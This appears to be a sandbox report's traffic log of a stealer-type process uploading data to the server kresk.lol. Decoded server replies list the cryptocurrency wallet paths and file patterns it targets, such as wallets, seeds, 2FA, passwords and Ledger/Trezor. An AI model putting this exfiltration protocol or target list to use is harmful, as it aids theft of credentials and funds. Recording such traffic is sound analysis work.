2024-12-04 16:04:59 UTC | 318 bytes | OUT | POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QIEU3EUA1N7YM7GV37Q1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 66001
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
2024-12-04 16:04:59 UTC | 16355 bytes | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 0d 0a 43 6f 6e 74
Data Ascii (CR/LF pairs restored from the raw bytes; the sandbox shows only the first 256 bytes of this chunk, so the third part is cut off after "Cont"):
------QIEU3EUA1N7YM7GV37Q1
Content-Disposition: form-data; name="token"

6aeb446e65e3de6e8bd63f79e11152e9
------QIEU3EUA1N7YM7GV37Q1
Content-Disposition: form-data; name="build_id"

d32ef9a4f5283c4820a5915619c67f72
------QIEU3EUA1N7YM7GV37Q1
Cont
2024-12-04 16:05:00 UTC | 158 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:00 UTC | 12 bytes | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49792 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:02 UTC | 319 bytes | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----K6FUAAS26F3E379HDBSJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 153381
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                      Data Ascii: ------K6FUAAS26F3E379HDBSJContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------K6FUAAS26F3E379HDBSJContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------K6FUAAS26F3E379HDBSJCont
2024-12-04 16:05:04 UTC | 158 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49797 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:03 UTC | 319 bytes | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----V37900RQQ9RQIEU37QQQ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                      Data Ascii: ------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------V37900RQQ9RQIEU37QQQCont
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 16:05:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49804 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:06 UTC | 319 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6X4ECT0ZMOZUAAA1VSRI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:06 UTC | 16355 | OUT | Data Ascii (CRLF line breaks restored from the raw dump):
------6X4ECT0ZMOZUAAA1VSRI
Content-Disposition: form-data; name="token"

6aeb446e65e3de6e8bd63f79e11152e9
------6X4ECT0ZMOZUAAA1VSRI
Content-Disposition: form-data; name="build_id"

d32ef9a4f5283c4820a5915619c67f72
------6X4ECT0ZMOZUAAA1VSRI
Cont
2024-12-04 16:05:08 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2\r\nok\r\n0\r\n\r\n (one 2-byte chunk containing "ok" followed by the terminating zero-length chunk, i.e. the server answered the POST with the body "ok")


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49805 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:07 UTC | 320 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PP89HLXLFCBIM7YCTJ5X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:07 UTC | 16355 | OUT | Data Ascii (CRLF line breaks restored from the raw dump):
------PP89HLXLFCBIM7YCTJ5X
Content-Disposition: form-data; name="token"

6aeb446e65e3de6e8bd63f79e11152e9
------PP89HLXLFCBIM7YCTJ5X
Content-Disposition: form-data; name="build_id"

d32ef9a4f5283c4820a5915619c67f72
------PP89HLXLFCBIM7YCTJ5X
Cont
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:05:19 UTC | 158               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:05:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
25         | 192.168.2.4 | 49811       | 159.69.102.165 | 443              | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:05:10 UTC | 316               | OUT       | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----W4OHLXBIEU3EUA1VAASR
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:10 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------W4OHLXBIEU3EUA1VAASRContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------W4OHLXBIEU3EUA1VAASRContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------W4OHLXBIEU3EUA1VAASRCont
2024-12-04 16:05:11 UTC | 158               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:05:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
                                                                                                                                                                      2024-12-04 16:05:11 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
26         | 192.168.2.4 | 49816       | 159.69.102.165 | 443              | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:05:13 UTC | 316               | OUT       | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQIEKNGVAAAAIE3O8Q16Cont
2024-12-04 16:05:15 UTC | 158               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:05:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
                                                                                                                                                                      2024-12-04 16:05:15 UTC1636INData Raw: 36 35 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                      Data Ascii: 658REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
27         | 192.168.2.4 | 49821       | 159.69.102.165 | 443              | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:05:17 UTC | 317               | OUT       | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CB1DTR9ZC2V37Q1VKXBS
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 1825
    Connection: Keep-Alive
    Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:17 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------CB1DTR9ZC2V37Q1VKXBSCont
2024-12-04 16:05:18 UTC | 158               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:05:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:05:18 UTC | 12                | IN        | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
28         | 192.168.2.4 | 49828       | 159.69.102.165 | 443              | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:05:19 UTC | 317               | OUT       | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----QQ9H4W4WLXBAIEK6PPHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 1825
    Connection: Keep-Alive
    Cache-Control: no-cache
